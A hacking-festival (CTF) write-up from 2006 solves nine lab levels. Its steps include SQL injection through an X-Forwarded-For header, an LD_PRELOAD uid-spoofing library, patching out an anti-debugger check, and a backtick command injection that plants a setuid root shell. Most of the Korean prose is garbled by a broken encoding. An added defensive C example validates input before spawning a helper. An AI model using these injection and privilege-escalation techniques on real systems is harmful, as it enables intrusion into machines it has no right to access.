UDCSC 2006 Hacking Festival Report
[hkpco@ns hkpco]$ whoami
name : Park Chan Am
id : hkpco
mail&msn : hkpco@korea.com
homepage : http://hkpco.kr/
face_quality : High
: б
======================================================================================================
Ϻ б ̶ (?) ظ Ź帳ϴ.
̹ html̳ pdf ۼϰ ;..;
賡 ؾ߰ڽϴ. ^^;
======================================================================================================
Round 1.
----------------------------------------------------------------------
LEVEL1
UDCSC ȸ Ȩ ߴٰ?!
UDCSC ȸ Ȩ ̵ϱ
----------------------------------------------------------------------
ȸ Ȩ ŷߴٰ մϴ.
`ȸȨ ̵ϱ` ŬϿ ũ Ŭ ų(?) ѱ ϴ.
( ũ ϳ ɸ ʾұ )
ҽ⸦ غ( ٷ ãҽϴ.) Ʒ κ Դϴ.
iframe ܳ.. ϴ.
http://168.188.130.240/e987463bf0418539b306409f86997a21/count.php ,
մϴ! level1 н 'lets go together!' Դϴ.
н带 ȹϿϴ. ^^;
Round 2.
----------------------------------------------------------------------
LEVEL2
ڸ ƶ!
( ......... )
ѹα ౸ ȭ!
----------------------------------------------------------------------
level2 , ڵ尡 ִ ҽ Ǹ ϴ.
ҽ⸦ ϸ Ʒ ̸ Դϴ.
|
ΰ ġ±.
ó whatisthis.jpg غ Cҽ ־ϴ.
鼭 ϴ α̾µ, 15 ֽϴ.
Round 3.
----------------------------------------------------------------------
LEVEL3
ũĿ ɸ Ż Ʈ ¥ ƿƼ ÷.
ũĿ ɸ ID ˾Ƴ Ű!
ͳ ǵ ƿƼ ٿε
----------------------------------------------------------------------
Ŷ ĸ ٸ ˸ Ǯ ִ Դϴ.
irc ϴ α̱ ^^;
:padoirc.padocon.org 001 KOR|762083 :Welcome to the PADOCON IRC Network KOR|762083!otghnkz@59.15.35.196
:padoirc.padocon.org 002 KOR|762083 :Your host is padoirc.padocon.org, running version Unreal3.2.3
:padoirc.padocon.org 003 KOR|762083 :This server was created Wed Apr 27 2005 at 18:00:59 KST
:padoirc.padocon.org 004 KOR|762083 padoirc.padocon.org Unreal3.2.3 iowghraAsORTVSxNCWqBzvdHtGp
lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:padoirc.padocon.org 005 KOR|762083 SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60
NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20
WALLCHOPS WATCH=128 :are supported by this server
:padoirc.padocon.org 005 KOR|762083 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,
psmntirRcOAQKVGCuzNSMTG NETWORK=PADOCON CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT
STATUSMSG=@%+ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:padoirc.padocon.org 251 KOR|762083 :There are 6 users and 5 invisible on 1 servers
:padoirc.padocon.org 254 KOR|762083 4 :channels formed
.
.
.
:KOR|762083!otghnkz@59.15.35.196 JOIN :#test
:padoirc.padocon.org 353 KOR|762083 #test:KOR|762083 KOR|778454 [8]KOR|762021 KOR|114838 crackers1m0dun KOR|441656 KOR|831437
:padoirc.padocon.org 366 KOR|762083 #test :End of /NAMES list.
:padoirc.padocon.org 302 KOR|762083 :KOR|762083=+otghnkz@59.15.35.196
:padoirc.padocon.org 302 KOR|762083 :KOR|762083=+otghnkz@59.15.35.196
Password: crackers1m0dun
Round 4.
----------------------------------------------------------------------
Ư IP ϴ Proxy Server ϴ
Ʈ ִ. Ʈ ϶.
ID
PWD
----------------------------------------------------------------------
̹ ξ Ǯϴ.
ͿĿ , X-Forwarded-Forҵ sql injection ߴ ־µ
( ǵ ٰ ƴϾ ^^;)̹ ȸ ̷ ٴ...
Proxy Server ϴ Ʈ ִٰ Ͽϴ.
magic_quote onǾִٴ ֳ.
magic_quote onǾ־ Apache Environment ɼ ʽϴ.
level4 Apache Environment Ͽ sql injection ΰ ϴ.
Achilles ̿Ͽ 1и ~.
Proxy Server X-Forwarded-For ̶ Method ɴϴ.
ҵ忡 sql injection û ڽϴ.
GET /c853248badee15215da287ffa39d7965/level4.php?id=test&pwd=test HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://168.188.130.240/c853248badee15215da287ffa39d7965/
Accept-Language: ko
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 168.188.130.240
X-Forwarded-For: 'or 0=' <- ߰ κ
û----------------------------------------
մϴ! н 'caffelatt3' Դϴ.
Round 5.
----------------------------------------------------------------------
level5 ~ level 9
Login 168.188.130.240:SSH
id : udcsc
password : level4's password
-bash-3.00$ cat level5_hint
:: UDCSC ŷ 佺Ƽ 2006 LEVEL5 ::
. LEVEL5
/home/udcsc/level5/level5 Ѵ.
̿ؼ level5 н带 ȹض.
----------------------------------------------------------------------
~, Գ @_@
̹ ־ϴ Ǯ ־ϴ. ......
ٸ ̷̷ .. ϸ鼭 Բ ư Ƽ ߴ ־µ,,
̷ ...
ٸ ־, ȸ ǵ!, ^^;
ο ˷ִ, Ѵ Ͽ ۼؼ packetstorm ߾µ..
ۼ ϰ ~, Ʒ ũԴϴ.
http://packetstormsecurity.org/papers/attack/shl_hijacking.txt
shared library hooking̶ ִ Ͽ Ǯڽϴ.
-bash-3.00$ /home/udcsc/level5/level5
Sorry, Your id is not level5
level5 ƴ϶ ϴ±, uid,gidüũ Ͽ ڽϴ.( uid ϸ gid üũ ̷ϴ. )
-bash-3.00$ cat /etc/passwd|grep "level5"
level5:x:7979:7979::/dev/null:/sbin/nologin
-bash-3.00$ cat hk.c
#include <sys/types.h>
#include <unistd.h>

/* Preloaded overrides: every uid/gid query reports level5's id (7979). */
uid_t geteuid( void )
{
    return 7979;
}
uid_t getuid( void )
{
    return 7979;
}
gid_t getegid( void )
{
    return 7979;
}
gid_t getgid( void )
{
    return 7979;
}
-bash-3.00$ gcc hk.c -fPIC -shared -o hk.so
-bash-3.00$ export LD_PRELOAD="/tmp/hk.so"
-bash-3.00$ /home/udcsc/level5/level5
մϴ. level5 н 'i_like_raison' Դϴ.
nice!,
Round 6.
----------------------------------------------------------------------
:: UDCSC ŷ 佺Ƽ 2006 LEVEL6 ::
. LEVEL6
http://168.188.130.240/level6/Labyrinth.exe ٿƶ.
----------------------------------------------------------------------
α ?_?ϴ ƾ ϰ ֽϴ.
ã nop äָ ˴ϴ.
.. α س.. ˼մϴ.( 賡 ؾ߰ڳ )
004016BE 68 C4F25B00 PUSH Labyrint.005BF2C4 ; ASCII "Debugger is detected! process terminated!"
004016BE 90 NOP
004016BE 90 NOP
004016BE 90 NOP
004016BE 90 NOP
н带 ִ κ(Congratulation ~~~~~~) ãƼ jmpָ ..^^
Round 7.
----------------------------------------------------------------------
-bash-3.00$ cat level7_hint
:: UDCSC ŷ 佺Ƽ 2006 LEVEL7 ::
. LEVEL7
/home/udcsc/level7/level7 Ѵ.
̸ мؼ level7 н带 ȹض.
----------------------------------------------------------------------
level8 κ 1оȿ ǬͰ..
̹ ʿ ..!,
-bash-3.00$ ls -l /home/udcsc/level7/level7
-r--r--r-- 1 root root 4876 6 23 18:12 /home/udcsc/level7/level7
-bash-3.00$ cp /home/udcsc/level7/level7 /tmp/haha
-bash-3.00$ /tmp/haha
-bash: /tmp/haha: 㰡 źε
-bash-3.00$ chmod 755 /tmp/haha
-bash-3.00$ /tmp/haha
մϴ. level7 н '112' Դϴ.
Round 8.
----------------------------------------------------------------------
:: UDCSC ŷ 佺Ƽ 2006 LEVEL8 ::
. LEVEL8
ħ ־. ƶ!
----------------------------------------------------------------------
ħ ־ٰ մϴ. ..? ƴѵ...^^;
setuid۹̼ ϵ ãƺ Ư ǽɰ° ϴ.
ҳ Ͽ /home丮 ҽϴ.
-bash-3.00$ cd /home
-bash-3.00$ ls -al
հ 88
drwxr-xr-x 7 root root 4096 6 25 05:43 .
drwxr-xr-x 23 root root 4096 6 25 06:31 ..
-rw-r--r-- 1 7981 7981 24 6 23 13:00 .bash_logout
-rw-r--r-- 1 7981 7981 191 6 23 13:00 .bash_profile
-rw-r--r-- 1 7981 7981 124 6 23 13:00 .bashrc
-rw-r--r-- 1 7981 7981 383 6 23 13:00 .emacs
drwx------ 2 mysql mysql 4096 6 22 09:40 mysql
drwx------ 2 7978 7978 4096 6 23 23:35 shadow
drwx------ 8 udcsc udcsc 4096 6 25 07:48 udcsc
drwxr-xr-x 3 x15kangx x15kangx 4096 6 22 17:57 x15kangx
-bash-3.00$ cat /etc/passwd|grep "shadow"
-bash-3.00$
ߴ ǽɰ κ ֽϴ.
ٷ shadow!,
7981̶ user ãƺڽϴ.
-bash-3.00$ find / -user 7981 2>/dev/null
/mnt/.floppy/shadow
/home/.bash_logout
/home/.bashrc
/home/.emacs
/home/.bash_profile
-bash-3.00$ cat /mnt/.floppy/shadow
mysql pwd : shad0w!?
mysql pwdȹ ^^~
mysql ° ʹ غ ̰͵ İ ..
-bash-3.00$ mysql -u shadow -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3287 to server version: 3.23.58
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+----------+
| Database |
+----------+
| level4 |
| mysql |
| sebek |
| shadow |
+----------+
4 rows in set (0.00 sec)
mysql> use shadow
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+------------------+
| Tables_in_shadow |
+------------------+
| shadow |
+------------------+
1 row in set (0.00 sec)
mysql> select * from shadow;
+--------+--------------------+
| id | pwd |
+--------+--------------------+
| level8 | starcraft_forever! |
+--------+--------------------+
1 row in set (0.00 sec)
mysql>
Round 9. Fight!
----------------------------------------------------------------------
:: UDCSC ŷ 佺Ƽ 2006 LEVEL9 ::
. LEVEL9
Ŷ ſ ; Ѵ.
ϵ ִ .
----------------------------------------------------------------------
ſ ǹ̽մϴ. ..
ÿ 9000~9009 Ʈ ֽϴ.
Ʈ ִ° ƴϰ ÷ ٲ..
Ʒ ps -aux Ư Ʈ bindų Դϴ.
root 25870 0.0 0.1 2644 320 ? Ss 02:17 0:00 /usr/bin/level9 9005
root 25872 0.0 0.1 2856 276 ? Ss 02:17 0:00 /usr/bin/level9 9006
root 25874 0.0 0.1 2164 324 ? Ss 02:17 0:00 /usr/bin/level9 9007
root 25876 0.0 0.1 1516 324 ? Ss 02:17 0:00 /usr/bin/level9 9008
root 25878 0.0 0.1 3276 320 ? Ss 02:17 0:00 /usr/bin/level9 9009
root 26615 0.0 0.1 2280 272 ? Ss 02:32 0:00 /usr/bin/level9 9002
root 26619 0.0 0.1 2700 324 ? Ss 02:32 0:00 /usr/bin/level9 9004
.. ݸ ...
-bash-3.00$ ls -al /usr/bin|grep "level9"
-rwx------ 1 root root 7105 6 24 23:54 level9
-rwx------ 1 root root 6612 6 23 19:39 level9_send
-rwx------ 1 root root 221 6 25 00:06 level9_start.sh
-bash-3.00$ (perl -e 'print "A"x256')|nc localhost 9009
input your IP:
-bash-3.00$ (perl -e 'print "A"x255')|nc localhost 9009
input your IP:
got it?-bash-3.00$
ó 256Ʈ ̸̻ α got it? ϰ Ǿ remote fedora_bof ˾ҽϴ.
߿ ǵ ٸε б ȭ Ŷ ߰ ־ϴ.
ϳ ǵ ߰ߵǾϴ.
α level9_send ip Ǿµ, κп .. ſ .. ...
մϴ. Ƹ sprintfͰ %s ̿Ͽ ip ڰ ְ ״
⼭ ; , | , & ` ` ȸϿ ٸ ֽϴ.
̰ Ͽ Ʈ ȹ ڽϴ.
-bash-3.00$ cat /tmp/aa.c
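#include <stdlib.h>
#include <unistd.h>
int main( void )
{
    /* take root for both the real and effective ids, then start a shell */
    setreuid(0,0);
    setregid(0,0);
    system("/bin/sh");
    return 0;
}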
-bash-3.00$ cat /tmp/c.c
#include <stdlib.h>
int main( void )
{
    /* copy the shell wrapper and mark the copy setuid/setgid */
    system( "cp /tmp/aa /tmp/kk" );
    system( "chmod 6755 /tmp/kk" );
    return 0;
}
-bash-3.00$ chmod 6755 aa
-bash-3.00$ chmod 6755 c
-bash-3.00$ telnet localhost 9009
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
input your IP:`/tmp/c`
got it?Connection closed by foreign host.
-bash-3.00$ /tmp/c
sh-3.00#
Ʈ ȹ!, Ƹ level9_sendα ´ٸ н带 Դϴ.
strings ѹ Ȯ ڽϴ.
sh-3.00# strings /usr/bin/level9_send
/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
printf
socket
inet_addr
setsockopt
strncpy
htonl
sendto
memset
htons
_IO_stdin_used
__libc_start_main
strlen
GLIBC_2.0
PTRhx
a tiny encrypted packet! <--------------------------!!!
### usage : %s your_ip ###
your input %s is too long!
168.188.130.240
Password: a tiny encrypted packet! ^^;
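Round 9 works because the service apparently pastes the client's "IP" string into a shell command (the write-up guesses sprintf with %s), so backticks in the input are executed. As an added example, not code from the write-up or from the challenge, here is the defensive counterpart: the input is checked with inet_pton() and the helper is started through posix_spawn() with an argument array. The function names and the /bin/echo stand-in for level9_send are assumptions.

```c
/* Added example: validate the address first, then run the helper without a shell. */
#include <arpa/inet.h>
#include <spawn.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>

extern char **environ;

/* Returns 1 only for a strict dotted-quad IPv4 literal. Shell metacharacters,
 * spaces, trailing newlines and over-long input fail the length check or inet_pton(). */
int is_ipv4_literal(const char *s)
{
    struct in_addr addr;

    if (s == NULL || strlen(s) >= INET_ADDRSTRLEN)
        return 0;
    return inet_pton(AF_INET, s, &addr) == 1;
}

/* Rejects anything that is not an address, then starts `helper ip` with an argv
 * array, so no shell ever parses the value (unlike sprintf + system).
 * Returns the helper's exit status, or -1 if the input was rejected or the spawn failed. */
int run_helper(const char *helper, const char *ip)
{
    char *argv[] = { (char *)helper, (char *)ip, NULL };
    pid_t pid;
    int status;

    if (!is_ipv4_literal(ip))
        return -1;
    if (posix_spawn(&pid, helper, NULL, NULL, argv, environ) != 0)
        return -1;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* constructed inputs: a plain address, and the backtick string from the session above */
    printf("%d\n", run_helper("/bin/echo", "168.188.130.240"));
    printf("%d\n", run_helper("/bin/echo", "`/tmp/c`"));
    return 0;
}
```

A network service would strip the trailing newline from the received line before calling run_helper(), since the validator rejects it.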
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ı:::
б ⸻̶ ʷ . ֽñ..̤
߿ ڽϴ.
level8 ѽð ȵǼ ǬͰ 0_0 츦 ϱ⸸ ߴµ ̷ ֱ..
ȸ غѴٰ Ͻ е մϴ.
.. ̸ ġ Ϸ ߰ڳ...
ε ȳ ^^;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-